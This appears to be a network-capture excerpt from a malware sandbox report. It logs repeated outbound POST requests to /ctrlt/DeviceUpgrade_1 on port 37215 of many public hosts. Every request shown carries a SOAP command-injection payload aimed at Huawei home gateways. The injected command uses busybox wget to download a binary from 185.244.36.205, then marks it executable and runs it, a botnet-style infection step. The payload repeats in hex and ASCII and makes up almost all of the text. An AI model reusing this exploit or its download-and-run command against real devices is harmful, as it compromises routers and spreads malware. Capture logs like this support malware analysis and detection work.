                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2424192.168.2.1536436190.97.186.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476130962 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2425192.168.2.1541404156.96.99.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476144075 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2426192.168.2.1559930121.216.210.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476152897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2427192.168.2.1547388138.206.188.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476500034 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2428192.168.2.154167237.222.48.23237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476522923 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2429192.168.2.1559418102.108.250.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476576090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2430192.168.2.154451831.144.139.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476636887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2431192.168.2.155412241.252.10.14137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476648092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2432192.168.2.1556076197.85.80.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476692915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2433192.168.2.1542720122.155.20.2937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476759911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
